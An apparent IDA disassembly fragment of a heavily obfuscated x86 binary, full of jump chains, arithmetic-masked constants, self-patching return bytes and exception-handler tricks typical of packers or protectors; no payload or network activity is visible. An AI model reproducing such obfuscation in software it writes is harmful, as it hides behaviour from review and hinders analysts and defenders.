; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_44F6BF:				; CODE XREF: sub_445226+2D2j
		jl	loc_4553FE

loc_44F6C5:				; CODE XREF: sub_445226:loc_43D44Fj
		add	esi, 0FDF06E59h
		xor	esi, 0B7C0C36Eh

loc_44F6D1:				; CODE XREF: y2kk37jd:00453C96j
		and	esi, 9569A89Dh
		push	offset sub_454817
		jmp	nullsub_310
; ---------------------------------------------------------------------------

loc_44F6E1:				; CODE XREF: sub_445226:loc_44EA3Aj
		add	eax, 3BE01886h
		cmp	dword ptr [eax], 47424454h
		jz	loc_44D915
		jmp	loc_459413
; END OF FUNCTION CHUNK	FOR sub_445226

; =============== S U B	R O U T	I N E =======================================



sub_44F6F8	proc near		; DATA XREF: y2kk37jd:0043B18Bo

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043BE79 SIZE 0000000E BYTES

		push	ebp
		pop	edx
		xchg	edx, [esp+4+var_4]
		mov	ebp, edx
		pop	edx
		jmp	loc_43BE79
sub_44F6F8	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44606C

loc_44F705:				; CODE XREF: sub_44606C+17j
		pop	esi
		add	eax, 0E393AC41h
		cmp	eax, 0D16C0580h
		jmp	loc_43FBD5
; END OF FUNCTION CHUNK	FOR sub_44606C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442376

loc_44F717:				; CODE XREF: sub_442376-32B4j
		ja	loc_45467C
		jo	loc_457DDA
		jmp	loc_454EB6
; END OF FUNCTION CHUNK	FOR sub_442376
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_44F728:				; CODE XREF: sub_445226:loc_4489F1j
		jnz	loc_458373
		jmp	loc_441B15
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------

loc_44F733:				; CODE XREF: y2kk37jd:loc_43C246j
		add	edi, 8CFD6Ch
		add	edi, ebp
		add	edi, 50C72879h
		mov	[edi], eax
		pop	edi
		jmp	loc_455149
; ---------------------------------------------------------------------------

loc_44F749:				; CODE XREF: y2kk37jd:00445813j
		jge	loc_44612B
; START	OF FUNCTION CHUNK FOR sub_442F42

loc_44F74F:				; CODE XREF: sub_442F42-AC0j
		jmp	loc_4541DD
; END OF FUNCTION CHUNK	FOR sub_442F42
; ---------------------------------------------------------------------------
		test	edi, 0CCBD881Dh
		jmp	loc_455F67
; ---------------------------------------------------------------------------

loc_44F75F:				; CODE XREF: y2kk37jd:0043B6E1j
		add	esi, 215C1F17h
		xchg	esi, [esp]
		jmp	sub_442C3E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C4BC

loc_44F76D:				; CODE XREF: sub_44C4BC+Ej
		jnz	loc_456102
		jmp	loc_457149
; END OF FUNCTION CHUNK	FOR sub_44C4BC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4502C2

loc_44F778:				; CODE XREF: sub_4502C2+7j
		mov	ebp, esp
		mov	esp, ebp
		pop	ebp
		mov	eax, ds:dword_4470D0
		or	eax, eax
		jnz	loc_45A045
		jmp	loc_4523EA
; END OF FUNCTION CHUNK	FOR sub_4502C2
; ---------------------------------------------------------------------------

loc_44F790:				; CODE XREF: y2kk37jd:loc_447A94j
		xor	esi, 0EB2DDBB5h
		xchg	esi, [esp]
		mov	edx, esp
		push	ebx
		mov	ebx, edx
		xchg	ebx, [esp]
; START	OF FUNCTION CHUNK FOR sub_43F8B8

loc_44F7A1:				; CODE XREF: sub_43F8B8:loc_446ADCj
		call	sub_44C2AE

loc_44F7A6:				; CODE XREF: sub_444463+11D54j
		jmp	loc_451832
; END OF FUNCTION CHUNK	FOR sub_43F8B8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444A2B

loc_44F7AB:				; CODE XREF: sub_444A2B+17j
		cmp	dword ptr [ebp-0Ch], 5
		jnz	loc_44F7BC
		mov	eax, [ebp+8]
		or	dword ptr [eax-8], 8

loc_44F7BC:				; CODE XREF: sub_444A2B+11j
					; sub_44E4C0+3j ...
		jnb	loc_43FBA4
		call	sub_44B8EE

loc_44F7C7:				; CODE XREF: sub_4408B9+47E2j
		jmp	loc_457508
; END OF FUNCTION CHUNK	FOR sub_444A2B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45AC4B

loc_44F7CC:				; CODE XREF: sub_45AC4B+Cj
		mov	esi, ebp
		xchg	esi, [esp+4+var_4]
		mov	ebp, esp
		push	ecx
		mov	esp, ebp
		xchg	eax, [esp+4+var_4]
		mov	ebp, eax
		pop	eax
		jmp	loc_43D9AA
; END OF FUNCTION CHUNK	FOR sub_45AC4B

; =============== S U B	R O U T	I N E =======================================



sub_44F7E1	proc near		; DATA XREF: y2kk37jd:0044836Ao
		xchg	esi, [esp+0]
		mov	ecx, esi
		pop	esi
		xor	eax, eax
		retn
sub_44F7E1	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_44F7EA	proc near		; DATA XREF: y2kk37jd:00440DAAo
					; y2kk37jd:00446B01o

; FUNCTION CHUNK AT 0043B195 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 004406C9 SIZE 00000005 BYTES

		pop	large dword ptr	fs:0
		add	esp, 4
		jmp	loc_4406C9
sub_44F7EA	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_44F7F9:				; CODE XREF: y2kk37jd:00441776j
		popf
		jp	loc_450A1B
		cmp	ebp, eax
		jmp	loc_44B8BA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441AAB

loc_44F807:				; CODE XREF: sub_441AAB:loc_442F3Dj
		mov	edi, esi
		pop	esi
		lea	eax, nullsub_76
		push	offset sub_448A75
		jmp	nullsub_332
; END OF FUNCTION CHUNK	FOR sub_441AAB
; ---------------------------------------------------------------------------

loc_44F81A:				; CODE XREF: y2kk37jd:loc_45A5D0j
		rol	eax, 10h
		xor	eax, 0BE32169Ch
		rol	eax, 0Eh
		add	eax, 0E1143C77h
		push	ebx
		pushf
		push	0E62BF0E1h
		jmp	loc_451622
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B814

loc_44F838:				; CODE XREF: sub_44B814+9B83j
		jnz	loc_456E78
		jmp	loc_446660
; END OF FUNCTION CHUNK	FOR sub_44B814
; ---------------------------------------------------------------------------
		pop	edx
		mov	eax, [esp]
		call	sub_43E07B

loc_44F84C:				; CODE XREF: y2kk37jd:00452514j
		jmp	loc_451E52
; ---------------------------------------------------------------------------

loc_44F851:				; CODE XREF: y2kk37jd:0044AF4Aj
		jmp	nullsub_494
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C865

loc_44F856:				; CODE XREF: sub_43C865:loc_43D7EBj
		sub	ecx, 3F61B8E0h
		add	ecx, 0B5D4D9h
		cmp	ecx, 338AE8E8h
		jmp	loc_45075C
; END OF FUNCTION CHUNK	FOR sub_43C865
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_185. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_44F86E:				; CODE XREF: y2kk37jd:00448B9Cj
		jmp	loc_44E490
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_44F873:				; CODE XREF: sub_445226+24Aj
					; DATA XREF: y2kk37jd:0045A21Co
		jmp	loc_44151D
; END OF FUNCTION CHUNK	FOR sub_445226
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_57. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453867

loc_44F879:				; CODE XREF: sub_453867:loc_442FD9j
		call	nullsub_21

loc_44F87E:				; CODE XREF: y2kk37jd:loc_44456Fj
					; y2kk37jd:00447F45j
		js	loc_43C6AE
		call	sub_4577FE
		test	al, al
		jz	nullsub_197
		jmp	loc_4570FD
; END OF FUNCTION CHUNK	FOR sub_453867

; =============== S U B	R O U T	I N E =======================================



sub_44F896	proc near		; DATA XREF: sub_44C79E+905Eo
		xor	edx, 0DAE421B4h
		cmp	ebx, edx
		xchg	ecx, [esp+0]
		mov	edx, ecx
		call	sub_43CC73
sub_44F896	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_45BE0D

loc_44F8A8:				; CODE XREF: sub_45BE0D+18j
		jmp	loc_4585F2
; END OF FUNCTION CHUNK	FOR sub_45BE0D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44594E

loc_44F8AD:				; CODE XREF: sub_44594E:loc_44D9FBj
		jmp	loc_442AF2
; END OF FUNCTION CHUNK	FOR sub_44594E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_44F8B2:				; CODE XREF: sub_445226+14162j
		jnz	loc_448D6A
; END OF FUNCTION CHUNK	FOR sub_445226
; START	OF FUNCTION CHUNK FOR sub_4430DD

loc_44F8B8:				; CODE XREF: sub_4430DD+2BAFj
		jmp	nullsub_93
; END OF FUNCTION CHUNK	FOR sub_4430DD
; ---------------------------------------------------------------------------
		add	ebp, 42210526h
		or	esi, 0D478A639h
		jmp	loc_448D68
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_501. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440EC8

loc_44F8CF:				; CODE XREF: sub_440EC8+12C94j
		jmp	loc_45A180
; END OF FUNCTION CHUNK	FOR sub_440EC8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C865

loc_44F8D4:				; CODE XREF: sub_43C865+11026j
		jmp	loc_44AC12
; END OF FUNCTION CHUNK	FOR sub_43C865
; ---------------------------------------------------------------------------

loc_44F8D9:				; CODE XREF: y2kk37jd:004492A7j
		jmp	loc_44A952
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D3D0

loc_44F8DE:				; CODE XREF: sub_44D3D0:loc_458B1Dj
		cmp	al, 0A4h
		jz	loc_43CBAC
		jmp	loc_456684
; END OF FUNCTION CHUNK	FOR sub_44D3D0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448658

loc_44F8EB:				; CODE XREF: sub_448658:loc_43C633j
		not	eax
		and	ebx, eax
		call	sub_459AFA
		add	ebx, eax
		mov	eax, ds:dword_450BC8
		mov	[eax], ebx
		mov	eax, offset dword_450BB4
		jmp	loc_43F743
; END OF FUNCTION CHUNK	FOR sub_448658
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B488

loc_44F907:				; CODE XREF: sub_43B488:loc_45AE44j
		xchg	eax, [esp-4+arg_0]
		jmp	sub_45AAD1
; END OF FUNCTION CHUNK	FOR sub_43B488
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F8B8

loc_44F90F:				; CODE XREF: sub_43F8B8:loc_45B3D8j
		jnz	loc_446194
		jmp	loc_445B9D
; END OF FUNCTION CHUNK	FOR sub_43F8B8
; ---------------------------------------------------------------------------

locret_44F91A:				; CODE XREF: y2kk37jd:00444CB9j
					; y2kk37jd:loc_44AB37j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4411C3

loc_44F91B:				; CODE XREF: sub_4411C3+B7E5j
		jmp	sub_440CD1
; END OF FUNCTION CHUNK	FOR sub_4411C3
; ---------------------------------------------------------------------------

loc_44F920:				; CODE XREF: y2kk37jd:0044AECBj
		jmp	loc_457903
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F0A5

loc_44F925:				; CODE XREF: sub_43F0A5+3C47j
		jmp	loc_45AB7A
; END OF FUNCTION CHUNK	FOR sub_43F0A5
; ---------------------------------------------------------------------------

loc_44F92A:				; CODE XREF: y2kk37jd:00444B5Bj
		jno	loc_45AE01

; =============== S U B	R O U T	I N E =======================================



sub_44F930	proc near		; CODE XREF: sub_455C2D+Cp

var_C		= dword	ptr -0Ch
var_4		= dword	ptr -4

; FUNCTION CHUNK AT 004466B1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004494ED SIZE 0000001E BYTES
; FUNCTION CHUNK AT 0045391A SIZE 00000008 BYTES

		xchg	edx, [esp+0]
		pop	edx
		ror	eax, 0Eh
		push	esi
		call	sub_43F8B8

loc_44F93D:				; DATA XREF: sub_4521FC-1E78o
		call	sub_447832
		push	edx
		push	eax
		pop	edx

loc_44F945:				; CODE XREF: sub_44CF09:loc_44E04Aj
		xchg	edx, [esp+4+var_4]
		mov	eax, [ebp-8]
		push	eax
		jmp	loc_4494ED
sub_44F930	endp

; ---------------------------------------------------------------------------

loc_44F951:				; CODE XREF: y2kk37jd:00446D6Aj
		jp	loc_453C67

; =============== S U B	R O U T	I N E =======================================



sub_44F957	proc near		; CODE XREF: y2kk37jd:0043B22Dp
		xchg	ecx, [esp+0]
		pop	ecx
		cmp	dword ptr [ebp-14h], 6
		jmp	loc_457394
sub_44F957	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C865

loc_44F964:				; CODE XREF: sub_43C865:loc_45075Cj
		jl	loc_449EBC
; END OF FUNCTION CHUNK	FOR sub_43C865
; START	OF FUNCTION CHUNK FOR sub_446AC6

loc_44F96A:				; CODE XREF: sub_446AC6+2685j
		jmp	nullsub_94
; END OF FUNCTION CHUNK	FOR sub_446AC6
; ---------------------------------------------------------------------------
		add	ecx, 30A29F39h
		jmp	loc_449EB7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45354C

loc_44F97A:				; CODE XREF: sub_45354C:loc_45AEDBj
		push	offset loc_44395D
		jmp	nullsub_357
; END OF FUNCTION CHUNK	FOR sub_45354C

; =============== S U B	R O U T	I N E =======================================



sub_44F984	proc near		; DATA XREF: sub_445E1C+7C56o

; FUNCTION CHUNK AT 004415A4 SIZE 00000005 BYTES

		mov	[esi], eax
		pop	esi
		lea	eax, nullsub_374
		mov	byte ptr [eax],	0C3h
		jmp	loc_4415A4
sub_44F984	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		pop	edx
		mov	eax, [esp]
		push	edx
		push	edx
		jmp	loc_444AD4
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_507. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457239

loc_44F9A1:				; CODE XREF: sub_457239+12j
		jmp	loc_43F43C
; END OF FUNCTION CHUNK	FOR sub_457239
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A53E

loc_44F9A6:				; CODE XREF: sub_44A53E+5j
		jmp	loc_44F07B
; END OF FUNCTION CHUNK	FOR sub_44A53E
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_444. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4514DE

loc_44F9AC:				; CODE XREF: sub_4444B1+14j
					; sub_4514DE:loc_447A46j
		jmp	loc_443A80
; END OF FUNCTION CHUNK	FOR sub_4514DE
; ---------------------------------------------------------------------------

loc_44F9B1:				; CODE XREF: y2kk37jd:0045777Aj
		jnp	loc_44E943
		jg	loc_453E48

loc_44F9BD:				; CODE XREF: y2kk37jd:loc_458F40j
		push	0A5DBF887h
		pop	ecx
		xor	ecx, 756E38Ch
		jmp	loc_45463C
; ---------------------------------------------------------------------------
		shr	edx, 1Fh
		jmp	sub_43DD0E
; ---------------------------------------------------------------------------

loc_44F9D6:				; CODE XREF: y2kk37jd:00451995j
		call	sub_454413
		jmp	loc_44C8BD
; ---------------------------------------------------------------------------

loc_44F9E0:				; CODE XREF: y2kk37jd:0043CD6Bj
		call	sub_455677
; START	OF FUNCTION CHUNK FOR sub_445226

loc_44F9E5:				; CODE XREF: sub_445226+302j
		jmp	nullsub_95
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D51F

loc_44F9EA:				; CODE XREF: sub_44D51F:loc_442F6Ej
		mov	[ebp+var_4], eax
		cmp	[ebp+var_8], 0
		jnz	loc_44F9FD
		mov	eax, [ebp+var_4]
		mov	[ebp+var_8], eax

loc_44F9FD:				; CODE XREF: sub_44D51F+24D2j
		call	sub_45987F
		mov	[ebp+var_A], al

loc_44FA05:				; CODE XREF: sub_45986D+Dj
		jnb	loc_447DFD
		jmp	loc_450AC0
; END OF FUNCTION CHUNK	FOR sub_44D51F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_44FA10:				; CODE XREF: sub_445226-4024j
		push	eax
		ja	loc_457479
		jmp	loc_45600D
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4562E5

loc_44FA1C:				; CODE XREF: sub_4562E5:loc_43D9A0j
		jz	nullsub_63
		jmp	loc_458515
; END OF FUNCTION CHUNK	FOR sub_4562E5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F0A5

loc_44FA27:				; CODE XREF: sub_43F0A5+1CA3Bj
		jnz	loc_456C7A
		jmp	loc_45BA02
; END OF FUNCTION CHUNK	FOR sub_43F0A5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_44FA32:				; CODE XREF: sub_445226+10404j
		popf
		jge	loc_44381A
		pushf

loc_44FA3A:				; CODE XREF: sub_445226:loc_44C155j
					; sub_445226+CDE9j ...
		jmp	loc_43C515
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
		jmp	loc_44AAD4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CDD5

loc_44FA44:				; CODE XREF: sub_44CDD5:loc_43DC83j
					; y2kk37jd:loc_450BA8j
		add	edi, 14C11392h
		add	edi, ebp
		add	edi, 5AC34171h
		mov	[edi], eax
		pop	edi
		mov	eax, offset dword_44BDF0
		jmp	loc_4445FF
; END OF FUNCTION CHUNK	FOR sub_44CDD5
; ---------------------------------------------------------------------------

loc_44FA5F:				; CODE XREF: y2kk37jd:0045AB9Ej
		xor	ebp, eax
		xor	ebp, 17BF1E8Bh
		jmp	loc_44393D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D6A6

loc_44FA6C:				; CODE XREF: sub_43D6A6+Dj
		mov	eax, [eax-10h]
		shr	eax, 6
		mov	[ebp-10h], eax
		mov	eax, [ebp+8]
		mov	eax, [eax-10h]
		jmp	loc_45C6D8
; END OF FUNCTION CHUNK	FOR sub_43D6A6
; ---------------------------------------------------------------------------

loc_44FA80:				; CODE XREF: y2kk37jd:0045904Fj
		jnp	loc_4489B7
		sub	edi, eax

; =============== S U B	R O U T	I N E =======================================



sub_44FA88	proc near		; CODE XREF: y2kk37jd:004501E6p

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0044A1F6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045A7D7 SIZE 00000005 BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		mov	eax, [esp-4+arg_0]
		jmp	loc_45A7D7
sub_44FA88	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		retn

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_44FA95	proc near		; CODE XREF: sub_453B38-3A1p
					; sub_459DF8+3p

; FUNCTION CHUNK AT 0043C396 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0043EDBB SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00450508 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00451E8B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045A8F3 SIZE 00000012 BYTES

		push	ebp
		mov	ebp, esp
		push	ecx
		mov	esp, ebp
		xchg	esi, [esp+0]
		mov	ebp, esi
		jmp	loc_450508
sub_44FA95	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4429DD

loc_44FAA5:				; CODE XREF: sub_4429DD+5C3Fj
		rol	ebp, 3
		sbb	edx, 0AE086Bh
		sbb	edi, ecx
		pop	ebp

loc_44FAB1:				; CODE XREF: sub_4429DD:loc_4441BDj
		mov	eax, [ebp-0Ch]
		neg	eax
		sbb	eax, eax
		neg	eax
		jmp	loc_43B9A0
; END OF FUNCTION CHUNK	FOR sub_4429DD
; ---------------------------------------------------------------------------
		mov	edi, 4972D400h
		jmp	loc_44546E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44F142

loc_44FAC9:				; CODE XREF: sub_44F142-AFF1j
		xchg	esi, [esp-4+arg_0]
		jmp	sub_43F5BD
; END OF FUNCTION CHUNK	FOR sub_44F142
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C18D

loc_44FAD1:				; CODE XREF: sub_43C18D+17j
		push	offset sub_457357
		jmp	loc_459A5F
; END OF FUNCTION CHUNK	FOR sub_43C18D
; ---------------------------------------------------------------------------
		ja	loc_451F0B
		jmp	sub_44D935
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_62. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B924

loc_44FAE8:				; CODE XREF: sub_44B924-D6BDj
		jmp	loc_442FFD
; END OF FUNCTION CHUNK	FOR sub_44B924
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B814

loc_44FAED:				; CODE XREF: sub_44B814:loc_4447B5j
					; y2kk37jd:00457820j
		call	sub_4577FE
		test	al, al
		jz	loc_442409
		jmp	loc_4408B4
; END OF FUNCTION CHUNK	FOR sub_44B814
; ---------------------------------------------------------------------------

loc_44FAFF:				; CODE XREF: y2kk37jd:loc_45826Ej
		mov	byte ptr [eax],	0C3h
		jmp	loc_458B3F

; =============== S U B	R O U T	I N E =======================================



sub_44FB07	proc near		; CODE XREF: sub_410B67+14Cp
					; sub_44FB07+5j
					; DATA XREF: ...
		call	sub_44FB21
		jmp	ds:off_41E0A4
sub_44FB07	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43BD3D

loc_44FB12:				; CODE XREF: sub_43BD3D+17662j
		jmp	loc_457E56
; END OF FUNCTION CHUNK	FOR sub_43BD3D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B0F5

loc_44FB17:				; CODE XREF: y2kk37jd:loc_43CCEFj
					; sub_43B0F5+167E2j
		jmp	loc_43B531
; END OF FUNCTION CHUNK	FOR sub_43B0F5
; ---------------------------------------------------------------------------

loc_44FB1C:				; CODE XREF: y2kk37jd:0044F6BAj
		jmp	locret_4595EE

; =============== S U B	R O U T	I N E =======================================



sub_44FB21	proc near		; CODE XREF: y2kk37jd:loc_43E62Dj
					; sub_44FB21-3142j ...

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043C769 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044196B SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00441D69 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00442E9C SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0044505A SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0044B3D6 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044C5A2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044C9D3 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044E1FA SIZE 0000001B BYTES
; FUNCTION CHUNK AT 004532C0 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 004599F7 SIZE 0000000D BYTES

		jo	loc_4532C0
		pop	edx
		mov	eax, [esp-4+arg_0]
		push	edx
		jmp	loc_44C5A2
sub_44FB21	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456809

loc_44FB31:				; CODE XREF: sub_456809:loc_453C6Cj
					; sub_456809-2B92j
		rol	ecx, 19h
		xor	ecx, 0FDF37285h

loc_44FB3A:				; CODE XREF: y2kk37jd:loc_44EF9Aj
		add	ecx, ebp
		call	sub_43F911

loc_44FB41:				; CODE XREF: y2kk37jd:0045BD1Dj
		jmp	nullsub_393
; END OF FUNCTION CHUNK	FOR sub_456809
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4448E2

loc_44FB46:				; CODE XREF: sub_4448E2+Fj
		jmp	loc_43CC11
; END OF FUNCTION CHUNK	FOR sub_4448E2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44113A

loc_44FB4B:				; CODE XREF: sub_44113A-436j
		test	esi, edi
		jmp	loc_45604C
; END OF FUNCTION CHUNK	FOR sub_44113A
; ---------------------------------------------------------------------------
off_44FB52	dd offset loc_4507E6+2	; DATA XREF: sub_442938:loc_44A130o
		dw 0BA00h
		dd 19CFC62Bh, 0FF1170E8h, 0C8C150FFh, 18E9570Ch
		db 85h,	2 dup(0)
; ---------------------------------------------------------------------------

loc_44FB6B:				; CODE XREF: y2kk37jd:0044322Bj
		or	esi, edx

; =============== S U B	R O U T	I N E =======================================



sub_44FB6D	proc near		; CODE XREF: y2kk37jd:00451FDDp

; FUNCTION CHUNK AT 0044D013 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00451136 SIZE 00000005 BYTES

		xchg	edx, [esp+0]
		pop	edx
		push	ecx
		jmp	loc_451136
sub_44FB6D	endp

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_199. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_44FB78:				; CODE XREF: y2kk37jd:00450C66j
		jmp	loc_44288E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44131E

loc_44FB7D:				; CODE XREF: sub_44131E+1722j
		jmp	nullsub_522
; END OF FUNCTION CHUNK	FOR sub_44131E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CDD5

loc_44FB82:				; CODE XREF: sub_44CDD5:loc_44F660j
		sub	al, 99h
		mov	edx, [ebp-4]
		imul	byte ptr [edx]
		cmp	al, 0A4h
		jz	loc_44CD32
		jmp	loc_43BADA
; END OF FUNCTION CHUNK	FOR sub_44CDD5
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_119. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443AA7

loc_44FB97:				; CODE XREF: sub_443AA7+3A92j
		jmp	loc_4418DD
; END OF FUNCTION CHUNK	FOR sub_443AA7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_44FB9C:				; CODE XREF: sub_445226:loc_45259Aj
		add	edx, ebp
		add	edx, 0F46316E3h
		mov	[edx], eax
		pop	edx
		cmp	dword ptr [ebp-4], 0
		jmp	loc_43D911
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
		mov	edi, [ebx]
		jmp	sub_445F64
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442DDC

loc_44FBB7:				; CODE XREF: sub_442DDC:loc_4448DDj
		rol	esi, 0Ah
		sub	esi, 9FEFB4FFh
		cmp	esi, 0C672E319h
		jmp	loc_43EAE1
; END OF FUNCTION CHUNK	FOR sub_442DDC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43BF31

loc_44FBCB:				; CODE XREF: sub_43BF31:loc_45B3E2j
		inc	dword ptr [ebp-4]
		push	offset sub_45B583
		jmp	loc_43EAEC
; END OF FUNCTION CHUNK	FOR sub_43BF31
; ---------------------------------------------------------------------------
		add	esi, ebx
		jmp	loc_43F2EC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B7AA

loc_44FBDF:				; CODE XREF: sub_45B7AA:loc_44D354j
		jz	loc_45891C
		jmp	loc_44AED5
; END OF FUNCTION CHUNK	FOR sub_45B7AA
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_43. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_44FBEB:				; CODE XREF: y2kk37jd:0045162Fj
		jmp	loc_4451F2
; ---------------------------------------------------------------------------

loc_44FBF0:				; CODE XREF: y2kk37jd:loc_4428DDj
		jl	loc_450B20
		mov	ebx, 983BC52Bh

; =============== S U B	R O U T	I N E =======================================



sub_44FBFB	proc near		; CODE XREF: y2kk37jd:0043DF02p

; FUNCTION CHUNK AT 00455DB9 SIZE 0000001F BYTES

		xchg	edx, [esp+0]
		pop	edx
		jmp	loc_455DB9
sub_44FBFB	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_44FC04:				; CODE XREF: sub_445226-689Bj
		xchg	edx, [ebx]

loc_44FC06:				; CODE XREF: sub_445226:loc_45B0D1j
		mov	eax, [ebp-4]
		cmp	byte ptr [eax],	0F1h
		jnz	loc_44DE39
		jmp	loc_449C60
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F911

loc_44FC17:				; CODE XREF: sub_43F911+EDA5j
					; sub_43F911+1511Ej
		add	edx, 0CE4EC7BEh
		xor	edx, 0B92FD4F9h
		xor	eax, edx
		pop	edx
		ror	eax, 1Eh
		add	eax, 0D0E9676Dh
		ror	eax, 18h
		push	ecx
		jmp	loc_453821
; END OF FUNCTION CHUNK	FOR sub_43F911
; ---------------------------------------------------------------------------
